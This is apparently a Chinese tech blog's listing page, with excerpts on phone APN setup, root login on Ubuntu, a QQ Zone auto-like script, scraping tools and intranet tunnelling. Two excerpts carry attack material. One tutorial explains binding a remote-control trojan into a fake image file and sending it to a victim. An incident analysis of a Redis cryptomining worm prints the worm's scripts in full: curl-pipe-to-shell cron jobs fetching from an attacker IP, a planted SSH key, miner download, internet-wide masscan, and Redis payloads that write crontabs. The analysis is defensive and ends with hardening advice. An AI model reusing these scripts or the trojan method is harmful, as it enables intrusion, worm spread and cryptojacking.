    注意:必须开启数据漫游才可以使用,如果没设置apn前可以使用,突然不能用的,一般都是不需要设置apn,请检查其他原因。 安卓手机设置操作步骤如下: 第一步 第二步第三步 第四步:设置完成点击保存 iPhone手机设置操作步骤如下 第一步 第二步 第三步 第四步:设置完成点击保存 ...

    2020-05-24 910
  • 亲手实践图片木马

    HELLO大家好我是毒蜂 今天看前辈的帖子 图片远控,感觉很好玩的样子,就照着来了一发 事前准备: 1.远控软件 本人用的是金戈铁马防火墙压力测试,实在是找不到好用的远控了,就用这个代替了。 2. 木马图片整合软件  本人用的是 BD2.Net Injector By BD2, 3.一个ico图标 4.一个普通图片 注:我是用jpg格式做的,其实很多格式都可以 上工具 图片上是我的远控工具和我机器的ip地址,我是用内网做的,人畜无害。 生成木马什么的不用说了,接下来打开整合软件 第一条里添加你远控的路径 第二条里填你的伪格式, 还是用微信吧,qq传不过去的 第三条里添加你在网上做的ico图标 第四条选生成的路径 我就直接把我生成的文件拿到领一台机器上运行了 点击批量弹窗 他已经听你使唤了。 不要用作非法用途!!!! ...

    2020-05-13 825
  • ubuntu 设置默认root用户

    Ubantu操作系统:Ubuntu是一个以桌面应用为主的Linux操作系统,其名称来自非洲南部祖鲁语或豪萨语的“ubuntu"一词,意思是“人性”“我的存在是因为大家的存在",是非洲传统的一种价值观。Ubuntu基于Debian发行版和Gnome桌面环境,而从11.04版起,Ubuntu发行版放弃了Gnome桌面环境,改为Unity。从前人们认为Linux难以安装、难以使用,在Ubuntu出现后这些都成为了历史。Ubuntu也拥有庞大的社区力量,用户可以方便地从社区获得帮助。 为什么直接用root用户登录: 本地安装VMware安装ubantu,方便,不用再切换为root用户。 Ubuntu 18 root用户登录   为root设置初始密码   登录系统,打开终端,使用sudo指令获取root权限,更改root用户密码: sudo passwd root 修改登录界面 更改/usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf文件内容 sudo vim /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf 打开文件,在文件末尾加入如下两行,完成后保存并关闭(不要删除文件中原本的两行内容) greeter-show-manual-login=true all-guest=false 允许root用户直接登录图形界面 进入/etc/pam.d文件夹下,修改gdm-autologin和gdm-password文件内容(参考第2步的命令) gdm-autologin文件注释掉auth required pam_success_if.so user!=root quiet_success这一行 gdm-password文件注释掉auth required pam_success_if.so user!=root quiet_success这一行 #auth required pam_success_if.so user!=root quiet_success 设置环境变量 修改/root/.profile文件 sudo vim/root/.profile 默认没有vim 提示安装,安装就好 打开文件,将最后一行改为以下: tty -s && mesg n || true 保存并关闭,重启, 重启之后选择“未列出” 输入账号root和密码。 ...

    2020-05-12 1191
  • 利用Javascript代码实现QQ空间自动点赞

      使用方法:     1:进入QQ空间     2:复制下面代码     3:按F12或右键审查元素 进入控制台 也就是console     4:粘贴  回车键  即可     5:如果嫌慢的话可以 修改这段代码。     window.setInterval(autoClick,2000);  //2000代表两秒屏幕下滑5px; 代码如下: var x=5,y=10; function autoClick() { y=y+5; var zan=document.getElementsByClassName('item qz_like_btn_v3'); for(var i=0;i<zan.length;i++){ if(zan[i].attributes[6].value=='like'){ zan[i].firstChild.click(); } }; window.scrollBy(x,y); } window.setInterval(autoClick,2000); ...

    2020-05-03 591
  • 记一次linux(被)入侵

    0x00 背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了! 0x01 查找线索 服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把数据库全备份到本地,然后top命令看了一下,有2个99%的同名进程还在运行,叫gpg-agentd。 google了一下gpg,结果是: GPG提供的gpg-agent提供了对SSH协议的支持,这个功能可以大大简化密钥的管理工作。   看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一个字母d,伪装的很好,让人想起来windows上各种看起来像svchost.exe的病毒。继续 ps eho command -p 23374 netstat -pan | grep 23374 查看pid:23374进程启动路径和网络状况,也就是来到了图1的目录,到此已经找到了黑客留下的二进制可执行文件。接下来还有2个问题在等着我: 1,文件是怎么上传的? 2,这个文件的目的是什么,或是黑客想干嘛?   history看一下,记录果然都被清掉了,没留下任何痕迹。继续命令more messages, 看到了在半夜12点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务。 crontab -e 果然,线索找到了。 0x02 作案动机 上面的计划任务的意思就是每15分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。 curl -fsSL 159.89.190.243/ash.php > ash.sh 脚本内容如下: uname -a id hostname setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 crontab -r 2>/dev/null rm -rf /var/spool/cron/* 2>/dev/null mkdir -p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root   yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null   bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null 大致分析一下该脚本的主要用途: 首先是关闭SELinux,解除shell资源访问限制,然后在/root/.ssh/authorized_keys文件中生成ssh公钥,这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多,关于ssh keys的文章可以参考这一篇文章SSH原理与运用。接下来安装bash,最后是继续下载第二个脚本bsh.php,并且执行。   继续下载并分析bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/... sleep 1 if [ -f .watch ]; then rm -rf .watch exit 0 fi sleep 1 echo 1 > .watch sleep 1 ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null sleep 1 if ! [ -x /usr/bin/gpg-agentd ]; then curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db echo '/usr/bin/gpg-agentd' > /etc/rc.local echo 'curl -fsSL 159.89.190.243/ash.php|sh' >> /etc/rc.local echo 'exit 0' >> /etc/rc.local fi sleep 1 chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd sleep 1 if ! [ -x "$(command -v masscan)" ]; then rm -rf /var/lib/apt/lists/* rm -rf x1.tar.gz if [ -x "$(command -v apt-get)" ]; then export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y debconf-doc apt-get install -y build-essential apt-get install -y libpcap0.8-dev libpcap0.8 apt-get install -y libpcap* apt-get install -y make gcc git apt-get install -y redis-server apt-get install -y redis-tools apt-get install -y redis apt-get install -y iptables apt-get install -y wget curl fi if [ -x "$(command -v yum)" ]; then yum update -y yum install -y epel-release yum update -y yum install -y git iptables make gcc redis libpcap libpcap-devel yum install -y wget curl fi sleep 1 curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz sleep 1 [ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4 fi sleep 3 && rm -rf .watch bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/null 这段脚本的代码比较长,但主要的功能有4个: 1,下载远程代码到本地,添加执行权限,chmod u+x。 2,修改rc.local,让本地代码开机自动执行。 3,下载github上的开源扫描器代码,并安装相关的依赖软件,也就是我上面的messages里看到的记录。 4,下载第三个脚本,并且执行。   我去github上看了下这个开源代码,简直吊炸天。 MASSCAN: Mass IP port scanner This is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, > transmitting 10 million packets per second. It produces results similar to nmap, the most famous port scanner. Internally, it operates more > like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is > that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary > address ranges and port ranges. NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause  conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.   transmitting 10 million packets per second(每秒发送1000万个数据包),比nmap速度还要快,这就不难理解为什么阿里云把服务器冻结了,大概看了下readme之后,我也没有细究,继续下载第三个脚本。 setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null sleep 1 rm -rf .dat .shard .ranges .lan 2>/dev/null sleep 1 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n"' >> .dat echo 'config set dir "/var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "/var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat sleep 1 masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .shard sleep 1 masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .ranges sleep 1 ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet sleep 1 masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan sleep 1 while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null & done < .lan sleep 60 rm -rf .dat .shard .ranges .lan 2>/dev/null 如果说前两个脚本只是在服务器上下载执行了二进制文件,那这个脚本才真正显示病毒的威力。下面就来分析这个脚本。 一开始的修改系统环境没什么好说的,接下来的写文件操作有点眼熟,如果用过redis的人,应该能猜到,这里是对redis进行配置。写这个配置,自然也就是利用了redis把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的/root/.ssh/authorized_keys。登录之后就开始定期执行计划任务,下载脚本。好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护,不好意思,你就中招了。 0x03 总结 通过依次分析这3个脚本,就能看出这个病毒的可怕之处,先是通过写入ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过redis漏洞复制,迅速在全网传播,以指数级速度增长。那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。由此可以推断,应该是root帐号被暴力破解了,为了验证我的想法,我lastb看了一下,果然有大量的记录: 还剩最后一个问题,这个gpg-agentd程序到底是干什么的呢?我当时的第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。于是,顺手把这个gpg-agentd拖到ida中,用string搜索bitcoin, eth, mine等相关单词,最终发现了这个:   打开nicehash.com看一下,一切都清晰了。 0x04 安全建议 一、服务器 1,禁用ROOT 2,用户名和密码尽量复杂 3,修改ssh的默认22端口 4,安装DenyHosts防暴力破解软件 5,禁用密码登录,使用RSA公钥登录 二、redis 1,禁用公网IP监听,包括0.0.0.0 2,使用密码限制访问redis 3,使用较低权限帐号运行redis   到此,整个入侵过程基本分析完了,如果大家对样本有兴趣,也可以自行去curl,或是去虚拟机执行上面的脚本。鉴于本人能力有限,文中难免会出现疏忽或是错误,还请大家多多指正。 ...

    2020-04-13 495
  • 不懂代码也能爬取数据?试试这几个工具

    前天,有个同学加我微信来咨询我: “毒蜂,我想抓取近期 5000 条新闻数据,但我是文科生,不会写代码,请问该怎么办?” 有问必答,毒蜂对于这位同学的问题,我给安排上。 先说说获取数据的方式:一是利用现成的工具,我们只需懂得如何使用工具就能获取数据,不需要关心工具是怎么实现。打个比方,假如我们在岸上,要去海上某个小岛,岸边有一艘船,我们第一想法是选择坐船过去,而不会想着自己来造一艘船再过去。 第二种是自己针对场景需求做些定制化工具,这就需要有点编程基础。举个例子,我们还是要到海上某个小岛,同时还要求在 30 分钟内将 1 顿货物送到岛上。 因此,前期只是单纯想获取数据,没有什么其他要求的话,优先选择现有工具。 可能是 Python 近来年很火,加上我们会经常看到别人用 Python 来制作网络爬虫抓取数据。从而有一些同学有这样的误区,想从网络上抓取数据就一定要学 Python,一定要去写代码。 其实不然,毒蜂介绍几个能快速获取网上数据的工具。 1.Microsoft Excel 你没有看错,就是 Office 三剑客之一的 Excel。Excel 是一个强大的工具,能抓取数据就是它的功能之一。我以耳机作为关键字,抓取京东的商品列表。 等待几秒后,Excel 会将页面上所有的文字信息抓取到表格中。这种方式确实能抓取到数据,但也会引入一些我们不需要的数据。如果你有更高的需求,可以选择后面几个工具。 2.火车头采集器 火车头是爬虫界的老品牌了,是目前使用人数最多的互联网数据抓取、处理、分析,挖掘软件。它的优势是采集不限网页,不限内容,同时还是分布式采集,效率会高一些。缺点是对小白用户不是很友好,有一定的知识门槛(了解如网页知识、HTTP 协议等方面知识),还需要花些时间熟悉工具操作。 因为有学习门槛,掌握该工具之后,采集数据上限会很高。有时间和精力的同学可以去折腾折腾。 官网地址:http://www.locoy.com/ 3.八爪鱼采集器 八爪鱼采集器是一款非常适合新手的采集器。它具有简单易用的特点,让你能几分钟中就快手上手。八爪鱼提供一些常见抓取网站的模板,使用模板就能快速抓取数据。如果想抓取没有模板的网站,官网也提供非常详细的图文教程和视频教程。 八爪鱼是基于浏览器内核实现可视化抓取数据,所以存在卡顿、采集数据慢的特点。但这瑕不掩瑜,能基本满足新手在短时间抓取数据的场景,比如翻页查询,Ajax 动态加载数据等。 网站:https://www.bazhuayu.com/ 4.GooSeeker 集搜客 集搜客也是一款容易上手的可视化采集数据工具。同样能抓取动态网页,也支持可以抓取手机网站上的数据,还支持抓取在指数图表上悬浮显示的数据。集搜客是以浏览器插件形式抓取数据。虽然具有前面所述的有点,但缺点也有,无法多线程采集数据,出现浏览器卡顿也在所难免。 网站:https://www.gooseeker.com/ 5.Scrapinghub 如果你想抓取国外的网站数据,可以考虑 Scrapinghub。Scrapinghub 是一个基于Python 的 Scrapy 框架的云爬虫平台。Scrapehub 算是市场上非常复杂和强大的网络抓取平台,提供数据抓取的解决方案商。 地址:https://scrapinghub.com/ 6.WebScraper WebScraper 是一款优秀国外的浏览器插件。同样也是一款适合新手抓取数据的可视化工具。我们通过简单设置一些抓取规则,剩下的就交给浏览器去工作。 地址:https://webscraper.io/ 如果你觉得文章不错的话,分享、收藏、在看是对猴哥的最大支持,是毒蜂持续创作的动力。 ...

    2020-04-12 608
  • 内网穿透

    今天给大家做个内网穿透教程就是让外网用户访问自己电脑的网站 注册宝塔大家应该都有吧 直接打开面板吧看我操作 直接跳过填我们内网IP这个9909端口是我预先设置好的不会设置看我操作这里端口映射直接开端口就行 接下来我们测试一下 现在我们用内网穿透来做外网 内网穿透官网natapp.cn 本地文件看我操作 直接9909端口这个端口可以随便设置必须是数字还有这里的内网IP只能是自己电脑的IP才可以否则不行这个端口得和宝塔面板里的一致 接下来打开内网穿透 复制一下代码  natapp -authtoken=c894d6fc766453a5这个是我的代码authtoken=后面的是不一致的每个隧道都有一个好了我们直接打开平台提供的工具开始穿透 现在可以看到穿透成功了 都是瞎鸡巴扯的大佬勿喷 工具我都传到QQ群方便大家讨论、下载:641912805 ...

    2020-03-26 604

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注